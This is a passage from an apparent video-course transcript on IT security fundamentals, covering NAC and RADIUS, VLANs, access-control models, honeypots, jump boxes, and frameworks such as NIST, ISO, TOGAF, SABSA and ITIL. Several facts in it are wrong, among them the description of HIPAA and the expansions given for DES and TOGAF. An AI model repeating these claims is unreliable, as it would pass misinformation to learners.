a user link and the Select User, Computer, Service Account, or Group dialog box opens. He types help in the
Enter the object name to select text box and clicks the Check Names button. Then the Multiple Names Found
dialog box opens. It includes the OK and Cancel buttons.]
Now we know that HelpDesk User1 was a member of that group. So we're going to select them and click
OK. [Then the Multiple Names Found dialog box closes. The Select User, Computer, Service Account, or
Group dialog box reappears and he clicks the OK button. Then this dialog box closes and the Advanced
Security Settings for UserDataFiles dialog box reappears.] Now what we want to do is click the View
effective access button down below. [Then a table with three columns and several rows appears below the
View effective access button. The column headers are Effective access, Permissions, and Access limited
by.] Now as we kind of scroll down, so we can see what happens here. Notice that what we do see is that they
do have the ability – there is a green checkmark here, and this little picture of a group which means the user
got it through group membership – that the HelpDesk User1 has the ability to create folders, but they can't
write or delete or do anything like that. So therefore, user files are protected from that. So we've solved our
issue, we've given only the required permissions in our scenario that is required for the Help Desk group. In
this video, we learned how to set NTFS file system permissions.
After completing this video, you will be able to recognize the purpose of controlling network access with
Network Access Control (NAC).
Objectives
[Topic title: Network Access Control. The presenter is Dan Lachance.] The first line of defense for network
security is limiting who can connect to the network in the first place – whether it's wired or wireless. In this
video, we'll talk about Network Access Control. This is often referred to as NAC – N-A-C. And it applies to
connectivity points or edge point devices on the network. Things like network switches, wireless routers, VPN
appliances, dial-in appliances, and so on essentially entry points to the network. Network Access Control
components include the supplicant – this is the client device that's attempting to connect to a network. So it
could be an end user with their smartphone or their laptop or a desktop or tablet device. An endpoint device is
also referred to as a RADIUS client. Now you have to be careful not to confuse that with the supplicant.
So the RADIUS client is not the end-user smartphone or a laptop, for instance, trying to connect through a
VPN, those are called supplicants. A RADIUS client is an edge point network device like a switch, a VPN
device, or a wireless router. Endpoint devices, however, should never perform authentication because they're
on the edge of the network. They potentially could be compromised. And, if they are compromised, we don't
want credentials revealed from those devices. So, instead, they should use an authentication server where they
forward authentication requests. Now the authentication server is simply called a RADIUS server. And this
centralized authentication host should exist on a protected internal network – our endpoint devices will forward
requests to it.
IEEE 802.1X is a security standard. It's port-based Network Access Control where a port is simply a logical
connection to the LAN somehow. It uses EAP – E-A-P, which stands for Extensible Authentication Protocol.
Now only EAP traffic is initially allowed when a device initially attempts to connect to the network until after
successful authentication. This is called EAPOL or EAP over LAN. This means that the client device, the
supplicant won't even have a valid IP address until after successful authentication because our endpoint device,
let's say it's an Ethernet switch – does have an IP address that can communicate with our central RADIUS
server to ensure authentication succeeds first.
Now in order to be IEEE 802.1X compliant, your equipment may support it. It may simply need a firmware
update, things like wireless routers or network switches. In some cases, you might actually have to replace
your existing endpoint devices. IEEE 802.1X can also integrate with intrusion detection systems, IDSs or
intrusion prevention systems, IPSs, SIEM system, which is used for a security monitoring environment as well
as mobile device management or MDM solutions. Wireless routers can support WPA – Wi-Fi Protected
Access – or WPA2-Enterprise. Now WPA on a wireless network simply means a preshared key is configured
on the wireless router and that must be known by the connecting wireless clients.
However, WPA2-Enterprise is considered more secure than WPA or WPA2 preshared keys – PSKs. Now the
preshared key is simply a symmetric key but when we use the enterprise for WPA or WPA2, it uses a RADIUS
server, a central authentication server where we configure the RADIUS server IP address and listening port,
which has a default of UDP 1812. Also, a RADIUS client like a VPN appliance or a wireless router needs to be
configured with a shared secret, which is also configured on the centralized RADIUS authentication server. So
the key is used between RADIUS clients and servers and it is case sensitive.
[The web page of ASUS Wireless Router RT-N66U is open. Along the top of the screen are the Logout and
Reboot buttons. The rest of the page is divided into two parts. The first part includes three sections: the Quick
Internet Setup, General, and Advanced Settings. The General section includes the Network Map, Guest
Network, and AiCloud 2.0 tabs. The Advanced Settings section includes the Wireless, LAN, and WAN tabs. The
second part is divided into two sections. The first section includes a diagram. The diagram includes three
subsections. The first subsection includes the information about the Internet status. The second subsection
includes the information about the security level. The third subsection includes the information about the
clients and the USB devices that are connected. The second section is the System Status. This includes the
2.4GHz tab, the 5Ghz tab, and the Status tab. The 2.4GHz tab is open. It includes the Wireless name(SSID)
text box and the Authentication Method drop-down list.] On the screen, currently, you can see an ASUS
wireless router. And over on the right, under the System Status section, we can see that the Authentication
Method is configured for WPA2-Personal, which uses a preshared key. Here it's using AES encryption. So
there is a preshared key configured down below and that must be known by connecting clients. However, from
the Authentication Method drop-down list, what we could do is use for instance WPA2-Enterprise. [As soon
as Dan selects the WPA2-Enterprise drop-down option, the WPA-PSK key text box disappears.] Notice we
lose the field for their preshared key because that doesn't get used, instead, what I would do is click on
Wireless over on the left.
Now what you click on will vary greatly from one Wireless router admin page to another. [He selects the
Wireless tab and the Wireless tabbed page opens in the second part. The top of the page includes the General
tab, the WPS tab, and the RADIUS Setting tab. By default, the General tabbed page is open. The General
tabbed page includes the Band drop-down list, the SSID text box, and the Apply button.] But, anyways, here
I'll then click on the RADIUS Setting tab up at the top. [The RADIUS Setting tabbed page opens. It includes
the Band drop-down list, the Server IP Address text box, the Server IP Address text box, the Server Port text
box, the Connection Secret text box, and the Apply button.] And this is where I would specify the Server IP
Address of the centralized RADIUS authentication server. [He is referring to the Server IP Address text
box.] You can see that the listening port defaults to 1812. [He is referring to the Server Port text box.] And
then I configure the connection or shared secret that was configured on the RADIUS server. [He resumes the
explanation of the Network Access Control.] One final aspect of Network Access Control is client or
supplicant health checks – not to be confused with the RADIUS client.
We're talking about the actual end-user device like a smartphone or a laptop attempting to connect to the
network. So the health of that device can be checked where some configurations can be autoremediated. So the
things that might be checked in terms of health would be whether or not a malware scanner is functional and
up to date – whether a firewall is turned on on the device, whether updates have been applied, and whether
correct hardware peripherals exist – which might be required, for instance, for multifactor authentication. Now
autoremediation might mean, for instance, that if the firewall is there but not turned on on a connecting device,
it might be turned on so that the device is compliant and can continue to connect to the network. In this video,
we discussed Network Access Control.
Upon completion of this video, you will be able to recognize the purpose of network segregation using virtual
LANs.
Objectives
[Topic title: VLANs. The presenter is Dan Lachance.] In this video, we'll talk about VLANs. A VLAN is a
virtual local area network. It allows us to create a LAN which is considered a broadcast domain. And what that
means is that when a device sends out a broadcast to everyone, it is read by all devices on that LAN. VLAN is
applied at Layer 2 of the OSI model. That's the data-link layer which applies also to MAC addresses. A VLAN
is configured within a switch which is where the word virtual comes from, from VLAN.
All switch ports, however, by default are in the same VLAN. VLANs can also consist of some plugged in
devices in the switch or all of the devices. It depends how we can figure the VLAN which we'll go over
shortly. VLANs can also span multiple switches that are linked together. The purpose of a VLAN can be either
for a performance to break a larger network into smaller segments, which means we end up with multiple
broadcast domains – so multiple VLANs. Or we might have multiple VLANs for the purposes of security to
keep certain network devices isolated from others.
Now VLAN traffic from one VLAN doesn't talk to other VLANs without a router just like if you had physical
local area network segments that were separate, you would need a router to link them together. Now a Layer 3
switch applies to Layer 3 of the OSI model that's the network layer, which has routing capabilities built in. So
therefore, Layer 3 switch can link VLANs without an external need for a router. Now we might, for example,
have a VLAN that's used for imaging, which consumes a lot of bandwidth. And we might also have a different
VLAN for security purposes to keep accounting staff network traffic on its own network.
There are different types of VLAN configurations, the first of which is a switch port membership VLAN. So in
another words, it depends on the physical switch port that a device is plugged into. That determines the VLAN
that it's a member of. This would apply to OSI Layer 1 since we're talking about physical characteristics and
things that are plugged in with cables and connectors. The VLAN ports in this case do not have to be
contiguous – although in our pictured diagram they are [A diagram of Ethernet switch is displayed. It contains
eight ports.] – where on the left, the leftmost four ports are part of the OS imaging VLAN whichever devices
are plugged in. And on the right, the rightmost ports are for the accounting VLAN.
So it's important then when we plug devices into a network switch that we are conscious of how VLANs have
been configured. So plugging a station into a specific switch port could be a problem where it can't
communicate with the server it needs to talk to. Whereas, if you plug that into a different switch port and it
puts it on the right VLAN, maybe it would be able to talk to the server. So moved computers might require
either switch VLAN reconfiguration or you simply might have to plug it in to the correct port. We could also
configure MAC address-based VLANs. The MAC address is the 48-bit unique hardware address burned in the
network cards. It's also got a Layer 2 address. The Layer 2 applies to the OSI model that's the data-link layer.
So devices then with specific MAC addresses would be considered on the same VLAN. Each MAC address of
each device is associated with a specific VLAN. It's important to realize, of course, that switches already track
all of the MAC addresses plugged into specific ports on a switch. So for example, a given 48-bit hex MAC
address might be assigned to VLAN number 5. We can also create IP subnet VLANs, in other words, based on
the IP address of the plugged in device.
This would apply to OSI Layer 3 – the network layer. So devices with a specific IP network prefix are
considered to be on the same VLAN. So therefore, it wouldn't matter then which physical switch port the
device would be plugged into. Routing would allow VLANs to communicate with each other. So for example,
we could have a specific IP network prefix or address that is configured to be on a specific VLAN. [Subnet of
VLAN 5 is 25.1.2.3 and of VLAN 10 is 26.1.2.3.]
Other VLAN membership types include being configured for certain protocols. So for instance, using the IP
versus the IPX protocol suite or even using higher-level software or services to determine VLAN membership.
For instance, FTP traffic could place devices on an FTP-specific VLAN for that type of traffic. In this video,
we discussed VLANs.
Find out how to identify various conditions that restrict access to resources.
Objectives
[Topic title: Determining Resource Access. The presenter is Dan Lachance.] In this video, we'll talk about
resource access. A resource is something that we can connect to over a network like a file server, a database
server, a web application, and so on. So, when we determine resource access, we're talking about authorization
to use the resource. And authorization can only occur after successful authentication. Authentication is the
proving of one's identity, whether it's a user entering a username and a password or a specific smartphone with
a trusted PKI certificate being allowed to connect to a VPN as an example. ACLs are access control lists that
determine privileges that are granted or denied. Now you could have ACLs that apply at the network level. A
network ACL is something you would see on a packet filtering firewall to control traffic into and out of a
network, but then you could also see an ACL for a database that controls access to do certain things like insert
or update rows in the database table or it could be related to permissions granted to a folder on a file server and
so on. So there are many different incantations then of ACLs.
There are also other attributes that determine access to resources such as time-based, rule-based, location-
based, and role-based configurations. Let's take a look at each of those starting with time based. With time-
based resource access, we need to have a reliable time source. In a network environment, that really means
we're talking about using the Network Time Protocol or NTP to keep time in sync among multiple network
devices. We might have specific days and times where access is allowed. For example, SSH traffic from a
specific subnet to specific hosts might only be allowed during business hours. We might also have different
types of access depending on the time of day. For example, we might ensure that nobody is connected to a
server at 8:00 p.m. during weeknights because of backups.
We might also configure this time-based resource access through policies or on a specific network device. So
we might use centralized Microsoft Group Policies in Active Directory to configure this resource access or it
might be configured on a single device like a Cisco router. Now naturally, when it comes to troubleshooting,
IT technicians need to be aware if this type of time-based resource access is in use because without knowledge
of how this is configured, it could take a long time to troubleshoot why a user can't connect to a resource when,
in fact, it simply might not be allowed based on this type of configuration.
Then there is rule-based access control, which is also referred to as RBAC or sometimes ABAC where the "A"
stands for attribute-based access control. Basically, what this means is we are using conditions or rules that
determine resource access. An example of this is the Microsoft Windows Server 2012 R2 Dynamic Access
Control or DAC. This means, for example, users might have to belong to a group such as HR, but at the same
time, they have to be full-time employees and they might then get read/write privileges. Now full-time
employees could be determined through group membership, but one of the great things with condition or rule-
based access control is that we don't have to use groups. So, in the case of a Windows user – an Active
Directory user account – maybe there's an attribute filled in that determines whether that user is full-time or
not. So Dynamic Access Control can look at Active Directory attributes instead of just the traditional group
membership.
Location-based access control can also be referred to as LBAC. This is where the physical location of a user or
more specifically a device that they're using determines what access they have to resources. In the case of a
mobile device, we might use GPS tracking to determine the proximity of the user to a certain location or a
wireless network. Geofencing, for example, might disable mobile device cameras when the user is using that
mobile device within a secured area within a facility.
Role-based access control is also often referred to as RBAC. So, whenever you see RBAC, be careful to look
at the context in which that term is being used to ensure that you know whether it's referring to rule-based
access control or, as we're discussing now, role-based access control. With role-based access control,
privileges are assigned to roles. Users are then assigned to the roles. And therefore, they inherit the
permissions assigned to the role they're assigned to. Now this will facilitate access control list management in
larger companies because it's too difficult to manage, on a large scale, individual resource permissions granted
to individual user accounts. In this video, we discussed how to determine resource access.
recognize the purpose of intentionally creating vulnerable hosts to monitor malicious use
[Topic title: Honeypots. The presenter is Dan Lachance.] One way to detect malicious use is to configure a
honeypot. A honeypot is designed to monitor unauthorized use where detection of the activity is key. This is
made simple with virtualization where there are plenty of virtual appliances we can download or we could
build on our own virtual machine that has a few security vulnerabilities that would attract malicious users,
essentially its low hanging fruit. However, we want to be careful with unpatched DMZ systems.
We want to make sure that a compromised honeypot device doesn't let the attacker into other systems. And, at
the same time, it can also open us up to potential liability claims. Honeypot should be configured to forward
their logs to another secured host elsewhere because the assumption is that the honeypot itself could become
compromised. And, if it does, then any log information – which is what we're looking for here with the
honeypot – well, potentially it could be wiped by the attacker.
Honeypots come in various forms and apply to different levels. We can have an entire server operating system
being configured as a honeypot so we can track malicious activity against it. Or we could have a honeypot for
a specific service such as a vulnerable HTTP web service. Or we could have a honeypot for an individual file
or folder in which case it's called a honeytoken.
The HoneyDrive honeypot is a Linux-based virtual appliance that you can download. And it's out of the box
ready to go as an SSH honeypot, a web site honeypot. It also includes a wide variety of monitoring in
analytical tools to analyze SSH and web site traffic for malicious users. [The BruteForce Lab's Blog web page
is open. The page includes Home tab, About Me tab, and Miscellaneous drop-down list. By default, the
HoneyDrive tabbed page is open and the Miscellaneous drop-down list is selected. The Miscellaneous drop-
down list includes the DeltaBot, pyMetascan, and phpMetascan drop-down options.] If you plug HoneyDrive
honeypot into your favorite web search engine, it will be very easy to pull up the HoneyDrive honeypot web
page where you can see a description of what it is, you've got a download link, an installation set of
instructions, and a list of all of the features. So essentially, this is a virtual appliance that will run in different
virtualization environments.
[Dan resumes the explanation of honeypots.] So what is the real benefit of a honeypot? Well, its primary
purpose is to identify attack patterns, attacker identities in some cases, and then we can take those results and
further harden similar systems or services based on our findings from the honeypot. However, drawbacks
include the fact that there could be a liability if the honeypot, for instance, is used to target other victims
elsewhere. The other reality is that, from a legal standpoint, honeypot case law is very difficult to find. So there
really are no precedents on which to base current situations on.
Upon completion of this video, you will be able to recognize the purpose of a jump box.
Objectives
[Topic title: Jump Box. The presenter is Dan Lachance.] In this video, we'll discuss jump boxes. A jump box
is a secured computer that administrators go through to administer other devices. So it's a central and definable
entry point for administration. Now we must make sure that we harden the jump box itself, which is a
computer through which admins go to administer other devices, but also hardening of the originating
administrative computer is also very important where we might use a clean virtual machine whose purpose is
only administration, nothing additional gets installed on it.
Now, in terms of network precautions, we should always make sure we're using some type of encryption of all
network transmissions, whether we're using an IPsec VPN or we might also consider the use instead of or in
addition to an isolated VLAN so that administrative traffic is kept separate from regular end user IP traffic. We
should also consider the targeted systems that will be administered by administrators. They must be
configured. For example, their host-based firewalls should only allow connections from the jump box. We
should also make sure that the jump box computer itself cannot access the Internet because the last thing we
want to happen is for an administrator using the jump box maybe to download a driver from the Internet – for
example – and infect that jump box, which in turn has connections to other servers.
On the originating administrative station or host, there are precautions that we can take to protect our network.
First is to create a process whitelist – in other words, only the allowable processes that are allowed to run on
the originating administrative workstation. We can then determine which accounts are used to log on to that
system. So only administrative accounts, for example, should be allowed to log in to that originating system.
The originating system should also use multifactor authentication. Ideally, you might even use centralized
RADIUS authentication with auditing. Now host logs from this originating system should be forwarded to
another host because if it's compromised, the logs could be wiped.
A jump box arguably is a compelling target for malicious users. And the reason for this is quite simple because
if the jump box gets compromised, that could then give access potentially to multiple internal servers that are
administered through the jump box. On the scalability discussion, you could look at this from two perspectives.
So you could say that a jump box scales well because you've got a definable entry point for managing a
multitude of servers, whether they're on premises in the cloud or both. But, on the other hand, you could say
that it doesn't scale well. And that really depends on specifics but for example, if we're talking about hundreds
of administrators connecting through a single jump box to administer hundreds of internal servers elsewhere,
yes, it could be a scalability issue. So you might need more than one jump box. You might even configure it as
a load balance type of configuration.
In this video, we talked about jump boxes.
Table of Contents
After completing this video, you will be able to explain how proper IT governance results in secured IT
resources.
Objectives
[Topic title: IT Security Governance. The presenter is Dan Lachance.] IT security relates to risk. And risk
management is a very important responsibility. In this video, we'll talk about IT security governance.
IT security strategies need to align with business objectives because that's why IT systems are used in the first
place. There could be legal and regulatory compliance reasons that we have certain security controls in place.
We also have to consider their influence potentially on organizational security policies. Security governance
also deals with the responsibility related to the IT security strategy for the organization.
The oversight of risk management relates to IT security managers that must make decisions about effective
security controls that protect assets. IT security governance also deals with decision-making power and where
it lies. The creation of security policies and also the allocation of resources to protect assets fall under the
umbrella of IT security governance. IT security management deals with the enforcement of those security
policies and the actual usage of those resources. So notice the distinction then between IT security governance
and IT security management.
NIST, the National Institute of Standards and Technology in the United States, lists five common areas of IT
security governance where there is the protection of organizational assets, there is the protection of the
organization's reputation, there is the protection of shareholders, there is the acceptable use of IT systems by
organization employees, and of course, there is the assurance of legal and regulatory compliance.
With IT security governance, accountability for the IT security strategy falls upon the leaders. Related costs
are also considered – the costs that are required to stay in business. You can't get away without spending a
penny on IT security in a large organization. It is the cost of doing business. However, it needs to be worth the
investment and it has to, of course, be worth the asset that's being protected. User awareness and training is
very critical in assuring that everyone knows what the organization's specific IT strategy is. IT security
governance also implies that there is ongoing monitoring and review of security controls to ensure their
effectiveness in protecting assets.
After completing this video, you will be able to recognize how compliance with regulations can influence
security controls.
Objectives
Regulations will vary from industry to industry and also from jurisdiction to jurisdiction around the globe.
However, regulations can have an influence over the organization security policy, acceptable use policies, and
also the selection of which security controls will be used. So for example, specific data sanitization or wiping
tools might be required for law enforcement when wiping hard disks before equipment is decommissioned.
Confidentiality could also be a part of regulatory compliance where we are preventing the unauthorized access
of sensitive data. So encryption might be required for data in use, data in motion such as that being transmitted
over a network, and data at rest such as data being stored on disks either on premises or in the cloud. In some
cases, regulations might detail what are acceptable algorithms that are used for the encryption.
Regulatory compliance can also stipulate how we verify data integrity or the trustworthiness of data. There
might be certain authentication controls that must be put in place such as multifactor authentication, which is
required to connect to a sensitive network. Or there might be hashing that is required to generate a unique
value on data so that in the future when we run that calculation again, we can detect whether or not a change
has occurred because if a change has occurred, the unique value or hash will be different than the original hash.
Regulatory compliance can also apply to the availability of IT systems, networks, and data so that data is
available when it's needed. Now this might require us to use clustering solution so that network services are
running on multiple hosts. And, should one host fail, users will be redirected to that same network service
running on another host. Now, in order for the data to be kept up to date and consistent, clustered servers might
use shared storage. We might also use replication to replicate data to other locations or even to synchronize it
to the cloud. So we have another copy that's available if something happens to the primary copy of data. Now,
if we're going to do that, we should look very carefully at our cloud service-level agreement or SLA to make
sure that we know exactly what the availability promises are from that specific provider.
Some examples of regulations include Canada's PIPEDA. This is the Personal Information Protection and
Electronic Documents Act where it relates to data collection and how it will be used for private information. In
the United States of America, we've got HIPAA – the Health Insurance Portability and Accountability Act –
which controls how sensitive information is shared between US government agencies. In the European Union,
we've got the EU Data Protection Directive – Directive 95/46/EC – which deals with the protection of personal
data in and outside of the European Union.
Find out how to apply NIST's Cybersecurity Framework to your digital assets.
Objectives
apply NIST's Cybersecurity Framework to your digital assets
[Topic title: NIST. The presenter is Dan Lachance.] Standards are an important aspect of computing including
as it relates to security. In this video, we'll talk about NIST.
NIST stands for the National Institute of Standards and Technology in which there is a division called the
Computer Security Resource Center or CSRC. This division deals with the protection of information systems
in terms of tools that can be used and best practices to be followed.
FIPS stands for Federal Information Processing Standard. And it's a guideline used by US government
agencies. FIPS 201-2 deals with personal identity verification of federal employees and contractors. [Dan is
referring to Personal Identity Verfication of Federal Employees and Contractors for the year 2013.] Now this
can be done in a variety of ways by using smart card authentication where the possession of the physical card
is required in addition to knowledge of the PIN for the smart card. There are also specific card reader
requirements that must be met for the use of smart cards. There are certain cryptographic algorithm
requirements to be trusted that are part of FIPS 201-2 as well as the use of biometric authentication. Biometric
authentication is based on some unique characteristic that someone possesses such as their fingerprint or their
retinal scan.
FIPS 197 deals with the advanced encryption standard as of 2001. It supersedes the 1970s-derived DES or
Digital Encryption Standard. AES uses the Rijndael algorithm. And it's applied to both software and firmware.
So it can be used in many different devices or many different operating systems and applications. AES is a
symmetric block cipher that supports 128, 192, and 256 bits.
FIPS 186-4 is the digital signature standard. It defines acceptable methods that can be used to create unique
digital signatures. The purpose of a digital signature is to verify the authenticity of the originator – the sender
of a message. For example, in the case of e-mail, the sender generates a unique digital signature using their
private key to which only they have access. Now, in the receiving end, we can detect whether tampering has
taken place because we'll use a mathematically related public key to verify that the signature value is the same.
If it's different, something has changed. The digital signature standard also deals with nonrepudiation where an
originator cannot deny having sent the message because it was created with the private key to which only they
have access.
During this video, you will learn how to apply ISO security standards to secure your environment.
Objectives
apply ISO security standards to harden your environment
[Topic title: ISO. The presenter is Dan Lachance.] In this video, I'll discuss ISO.
ISO stands for the International Organization for Standardization. It is a series of standards and best practices
that can be adopted by organizations. In some cases, organizations might require ISO compliance and so,
therefore, must follow standards and best practices as suggested. ISO publishes numerous documents including
ISO/IEC 27033-5. Now this deals with securing communications across networks using virtual private
networks or VPNs. So it will detail VPN types, how VPN appliances are configured, and how VPN
connections supply confidentiality through various encryption methods. Confidentiality prevents sensitive
information from being accessible by unauthorized users.
ISO/IEC 27039 deals with the selection, deployment, and operations of intrusion detection and prevention
systems, otherwise called IDPS. [Dan is referring to the ISO/IEC 27039:2015.] This deals with host analysis
in the case of analyzing suspicious activity on a host itself or network analysis when we're detecting network
traffic looking for suspicious activity. In the case of network analysis, we've got to be conscious about
placement of the device or the solution on the network. So we can see the relevant traffic. It also deals with
IDS and IPS tweaking within a specific environment. All network environments are a little bit different from
one another. And as such, what's normal activity on one network might not be normal on another. So tweaking
is crucial. There are also IDS and IPS appliances that come in both hardware form as well as virtual machine
form that we can use in order to adhere to this ISO standard.
[The ISO/IEC 27039:2015(en) web page is open in the www.iso.org web site.] I've gone into my favorite
search engine and searched up ISO 27039. [The ISO/IEC 27039:2015(en) web page is divided into two
sections. The first section is the navigation pane. The second section is the content pane.] And here we can see
the details related to this specific standard. So, as we go through this document, which is available on the
Internet, we can see how it relates to intrusion detection and prevention systems and the guidelines or
recommendations that are part of this ISO standard. Now bear in mind, some organizations or government
agencies might require ISO accreditation. [He resumes the explanation of the ISO.] ISO/IEC 30121 deals with
the governance of digital forensic risk frameworks. This is more related then to the gathering of evidence and
ensuring that evidence is kept safe and not tampered with. So the guidelines are for preparing for digital
investigations. It deals with evidence availability and adherence to the chain of custody.
Upon completion of this video, you will be able to recognize how the TOGAF enterprise IT architecture can
increase the efficiency of security controls.
Objectives
recognize how the TOGAF enterprise IT architecture can increase efficiency of security controls
[Topic title: TOGAF. The presenter is Dan Lachance.] There are many different frameworks that can be
adhered to when securing an IT infrastructure. In this video, we'll talk about TOGAF.
TOGAF stands for The Open Group Architecture Forum. This is an enterprise architecture framework that
deals with improving resource efficiency. Now, as a result of that or as a by-product of that, we are improving
upon the return on investment in IT solutions. It also deals with process improvement. This is ongoing. So
periodic monitoring will ensure that business processes are efficient and effective as it relates to the IT systems
that support those processes. So, in the end, TOGAF really deals with improved business productivity.
On the IT efficiencies side, part of that involves application portability so that applications can be run on a
variety of platforms or in a variety of environments. So for example, part of TOGAF IT efficiencies details the
vendor lock-in problem. Now, in the case of public cloud providers, the last thing that we want is to be locked
into a specific cloud provider solution because we're using a proprietary solution that wouldn't work correctly
or without a major investment with a different provider. So this is something that has to be considered in the
case of an enterprise looking, in this particular example, at public cloud solutions. Other IT efficiencies related
to TOGAF include the rapid and cost-efficient procurement of IT solutions. And we have to be careful with
this one because we don't want to sacrifice security at all phases of development of the solution, but it does
relate to things like cloud rapid elasticity. This is one of the pillars of cloud computing – the ability to rapidly
provision IT resources as required and also the rapid ability to deprovision those resources when no longer
needed.
TOGAF also deals with stakeholder concerns where it addresses conflicting concerns. For instance, dealing
with the cost of an effective security control might not be something that an organization is ready to jump on
immediately if not absolutely required. Yet, at the same time – if we're talking about protecting customer
information – well, the customer would be a different type of stakeholder where, of course, it is in their interest
to protect their data. So we could have conflicting concerns that have to be carefully weeded out and addressed
so that all parties are kept happy and that we adhere to the required laws or regulations. Also, there needs to be
consistency with how stakeholder concerns are dealt with. Organizational policies will deal with this as well as
business processes.
In the end, it's important that all of our IT solutions support business processes so that we make sure our
solutions have some kind of return on investment over time because they aligned with business needs. Data
governance is also a part of TOGAF where we have data custodians that are required to take care of data.
Things like dealing with access to data, the backup of data, making sure data is highly available, making sure
that we adhere to laws and regulations as related to certain types of data such as personally identifiable
information or PII that must be kept under strict lock and key and that will vary in different parts of the world
in terms of exactly how that is done.
Data governance also deals with data migration. Now data migration could be reflected when we're looking at
moving to a public cloud solution where data exists currently on-premises. There is also the whole issue of big
data management and data analytics related to big data. With today's large volumes of data, we need effective
solutions to be able to process that data effectively. And usually, how that works out is by using some kind of
large scale distributed processing solution such as a Hadoop cluster.
recognize how to assess risk and apply effective security controls to mitigate that risk
SABSA is another framework. And it stands for Sherwood Applied Business Security Architecture. This
framework deals with security as related to business processes. So it's really an enterprise security architecture
that deals with enterprise service management. And its core driving factor is analyzing risk to assets that have
value to the organization. So SABSA then results in security solutions that support business objectives
directly.
SABSA consists of integrated frameworks. It's really the best of multiple worlds. Some of those integrated
frameworks include TOGAF, The Open Group Architecture Forum, as well as ITIL – the IT Infrastructure
Library – where those frameworks deal with making sure that we have very efficient business processes that
support business requirements and that are also secured with effective security controls. Now SABSA also has
a number of methods for implementation and these are standards based on NIST and ISO publications that are
related to things like business continuity and security service management. There are also legal and regulatory
compliance factors that have to be considered with SABSA and that will vary from one organization to the
next in different parts of the world in different industries.
The SABSA lifecycle begins with the planning phase where business requirements and related risk are
assessed. In the design SABSA phase, we can either look at existing security tools that we deem are effective
in protecting assets or processes or we could develop custom solutions. The idea is that security has to be a part
of all phases. Of course then, once we have designed our solution, we can make sure it gets implemented
properly and then managed and monitored over time. Now monitoring, of course, is an ongoing task to ensure
that business objectives are still met in a secure and efficient manner.
SABSA roles and responsibilities include those such as data custodians. Data custodians may not necessarily
make the rules about how data should be treated, but they must enforce them and make sure that data is
available, for instance, that is being backed up or that there is a clustering solution for data high availability or
that data is wiped or sanitized in an acceptable manner and so on. Then there are roles such as service
providers and consumers, which are bound in their activities by the service-level agreement or the SLA. In the
case of a public Cloud provider, for instance, the SLA will guarantee a certain amount of uptime usually
expressed as a percentage on a monthly basis.
Then of course, there is the inventory of assets that have value to the organization. This can be manual or
automated. And then there are network and host layout diagrams for configuration and security controls.
SABSA also deals with things like personnel management at the human resources or HR level. Things like
background checks, responsibilities for employees, and access control lists whereby the principle of least
privileges follow to ensure that people only have the privileges they need to perform a specific job function.
After completing this video, you will be able to recognize how to apply ITIL to increase the efficiency of IT
service delivery.
Objectives
[Topic title: ITIL. The presenter is Dan Lachance.] In this video, I'll discuss ITIL.
ITIL stands for Information Technology Infrastructure Library. And one of the ideas behind ITIL is to
efficiently deliver IT services that meet business needs. IT service management makes sure – besides aligning
to business needs – that business processes are supported with our IT solutions, that we can quickly adapt to
change and growth, and that we have got the efficient and effective delivery of IT services as required.
Starting with the Service Strategy and Service Design part of ITIL continuous improvement, with designed, we
must identify services that need to be provided, define how they'll be provided, and identify the need for them.
Now that also includes planning items such as the cost related to these required services and the way to
efficiently provide these services at a minimized cost. With the Service Transition portion, we're dealing with
things such as patch management for an IT solution as well as new versions of software that must be managed
over time. With Service Operation, we're really talking about configuring our IT solutions to meet business or
customer needs. And also, this is really the continuous life cycle of service improvement over time.
ITIL does not specify specific IT operational "how tos." It also is not a collection of best practices, but it does
provide various solutions to make IT system secure and efficient. It can also provide a service migration road
map from on-premises solutions to cloud provider solutions.
ITIL includes some recommendations on how to engage appropriate stakeholders whether they would be CIO
– Chief Information Officers – customers, end users within the organization, and so on. But ITIL is designed to
focus on customers and their needs. Of course, ITIL also allows us to mold this framework to our
organization's specific business processes so that we can standardize processes. And, by doing that, we enable
a quicker response to change when change is required. Now ITIL is continual service improvement over the
long term. So like a great investment, you have to be patient. It's designed to show improvement over time, but
it is ongoing and it requires diligent continuous monitoring.
[Topic title: Physical Controls. The presenter is Dan Lachance.] In this video, we'll talk about physical
controls.
Physical controls are right up there alongside user awareness and training as being simple common-sense
security solutions that are often overlooked. We need to think about risk countermeasures as related to physical
controls so that we can protect sensitive data, IT systems, of course physical property, as well as intellectual
property.
Threat scenarios as related to physical security controls include malicious users booting from alternative
media. What we could do to countermeasure that is to set a BIOS password. Then there is the threat of the
retrieval of sensitive data from USB thumb drives or mobile devices – both of which are easy to lose or to have
stolen. So one way to counteract that threat is to encrypt data at rest on these types of devices and also in the
case of mobile devices to enable remote wipe. There is also the threat of network traffic being captured and
analyzed. Well, other than the obvious of encrypting network transmissions physically, we might want to
control access to the network. We might do that using network access control or NAC with centralized
RADIUS authentication. But, at the physical level – if you think about, let's say, a reception area in an office –
any network wall jacks should probably be disabled. We don't want someone coming in with a laptop and
plugging into a wall jack behind a plant and gaining access to the network. The same, of course, applies to
wireless networks.
Then there are physical controls related to physical buildings and facilities or even floors within buildings.
Things like fencing to keep people out, proper lighting, security guards, security cameras, the use of ID badges
for personal identifications – especially after hours and even during work hours – mantraps, which require that
an outer door be closed before a second inner door allows access to a facility. So there are various security
systems, such as alarm and sensor systems, that can be used to physically protect buildings, facilities, and even
floors within buildings.
We should also consider the fact that in the event of a catastrophe, our data needs to be available elsewhere. So
we might have data replication to alternative locations or we might have backed uptake stored offsite. We
should be using door locks to protect sensitive areas of a facility. Certainly, that would include server rooms
and even within a larger data center, the front and back of server room racks should be locked. In the case of
end-user laptops, we could also use lock-down cables so that when a user is working within a certain location,
such as at a customer site, she could use the lock-down cable to secure the laptop around the leg of a piece of a
heavy furniture to prevent its theft. There can also be controlled access to floors and rooms. We have probably
all encountered this going into work after hours with a passcard that allows us access to only certain floors in a
building or only certain rooms within a facility. In the case of power outages, there shall also be backup
generators so that we can still use our electronic security systems.
To identify logical security controls, consult a security specialist or look for information online.
Objectives
[Topic title: Logical Controls. The presenter is Dan Lachance.] In this video, I'll talk about logical controls.
So we know that physical controls include things like locked doors to server rooms, fencing around a building,
and so on. But what exactly are logical controls? Well, these are often called technical controls. They are
designed to enforce access control to resources such as access to a network or to an IT system or to specific
data within a system. Either way, logical controls must align with organizational security policy and there
needs to be continuous monitoring and evaluation of the effectiveness of these controls in protecting data. And
you will notice that this is a common theme with IT security – continuously monitoring and verifying that our
security solutions properly protect assets.
Authentication is a logical control. And it is the proving of one's identity. There are three types of
authentication categories including something you know like a password, something you have like a smart
